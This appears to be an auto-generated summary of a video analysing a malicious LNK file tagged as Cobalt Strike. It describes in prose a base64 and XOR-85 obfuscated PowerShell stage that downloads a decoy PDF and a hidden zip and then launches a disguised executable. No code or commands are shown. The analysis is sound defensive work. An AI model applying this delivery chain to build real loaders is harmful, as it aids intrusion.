0xdf
This video is about the analysis of a malicious LNK file that was uploaded to the Malware Bazaar. After taking a closer look, the speaker discovered that the file was tagged as Cobalt Strike and proceeded with the analysis. The process involved multiple layers of redirection and downloading from a live C2 server using PowerShell and Linux. The speaker also analyzed a decoy PDF file but found nothing suspicious. They then looked at the unzipped runtime broker files that were extracted from the LNK file and found two identical MD5 sum files, which they deemed not interesting but still found potential C2 traffic on VirusTotal. The speaker concluded the video by inviting viewers to leave comments on what tasks they wanted them to do in the future.
In this section of the video, the speaker explains that while browsing Malware Bazaar, they noticed several executables had been uploaded, including several LNK files. LNK files are not a common occurrence, and the speaker decides to take a closer look. They discover one LNK file tagged as Cobalt Strike and proceed to analyze it. The analysis involves multiple layers of redirection and downloading from a live C2 server, using PowerShell and Linux. The speaker takes a look at the LNK file in Windows before pivoting to Linux to do the actual analysis. Despite the obfuscation, the speaker determines that the LNK file is generating a string and then invoking PowerShell.
In this section, the transcript describes using PowerShell to analyze a malicious LNK file. The script is pasted in and printed in an obfuscated form. After some replacing, it is converted from base64 into an array of bytes and then each byte is XORed by 85 and turned back into a string before being executed. The script then downloads a PDF and a zip file which is expanded and made hidden before running runtimebroker.exe. While analyzing the zip file, it is discovered that the writer left directory monitoring on, allowing for the download of each file.
In this section, the speaker analyzes a PDF file that was downloaded along with the malicious LNK file. He notices that the PDF file looks like a decoy document, and doesn't contain any suspicious code that could execute malicious actions. He then moves on to analyzing the runtime broker files that were unzipped from the malicious LNK file, and discovers that there are two files that have the same MD5 sum. The speaker suggests that they may not be super interesting, and decides not to dive further into reversing the Cobalt strike executables. Instead, he looks up the hash on VirusTotal, and finds some potential C2 traffic that could be further investigated.
In this section, the speaker concludes the video on malicious LNK file analysis and mentions that they came across an interesting LNK file that went through several steps of obfuscation and led to the identification of a Cobalt strike executable. The speaker invites viewers to leave comments on whether they want them to figure out a certain task in the future. The video ends with background music playing.
No videos found.
No related videos found.
No music found.